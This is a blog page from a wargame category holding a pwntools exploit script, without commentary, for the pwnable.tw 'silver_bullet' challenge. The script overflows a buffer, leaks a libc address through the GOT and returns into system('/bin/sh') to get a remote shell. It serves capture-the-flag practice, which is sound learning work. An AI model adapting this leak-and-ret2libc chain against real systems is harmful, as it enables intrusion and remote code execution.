1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 | from pwn import * s = remote('chall.pwnable.tw', 10103) #s = process('./silver_bullet') e = ELF('./silver_bullet') libc = ELF('libc_32.so.6') pr = 0x8048475 one = 0x5fbc5 s.sendlineafter('choice :', '1') s.sendafter('bullet :', 'A'*0x2f + '\x00') s.sendlineafter('choice :', '2') s.sendafter('bullet :', 'B') payload = '' payload += '\x7f\xff\xff' payload += 'B'*4 payload += p32(e.plt['puts']) payload += p32(pr) payload += p32(e.got['puts']) payload += p32(e.symbols['main']) s.sendlineafter('choice :' ,'2') s.sendafter('bullet :', payload) s.sendlineafter('choice :', '3') s.recvuntil('win !!\n') puts = u32(s.recv(4)) base = puts - libc.symbols['puts'] system = base + libc.symbols['system'] binsh = base + next(libc.search("/bin/sh")) print 'puts : ' + hex(puts) print 'base : ' + hex(base) print 'sysetm : ' + hex(system) print 'binsh : ' + hex(binsh) #================================================ s.sendlineafter('choice :', '1') s.sendafter('bullet :', 'A'*0x2f + '\x00') s.sendlineafter('choice :', '2') s.sendafter('bullet :', 'B') payload = '' payload += '\x7f\xff\xff' payload += 'B'*4 payload += p32(system) payload += 'AAAA' payload += p32(binsh) s.sendlineafter('choice :' ,'2') s.sendafter('bullet :', payload) s.sendlineafter('choice :', '3') s.recvuntil('win !!\n') s.interactive() | cs |
'Wargame > ▷ pwnable.tw' 카테고리의 다른 글
| [pwnable.tw] applestore (0) | 2018.08.03 |
|---|---|
| [pwnable.tw] orw (0) | 2018.07.29 |
| [pwnable.tw] dubblesort (0) | 2018.07.29 |
| [pwnable.tw] calc (0) | 2018.07.24 |
| [pwnable.tw] start (0) | 2018.03.04 |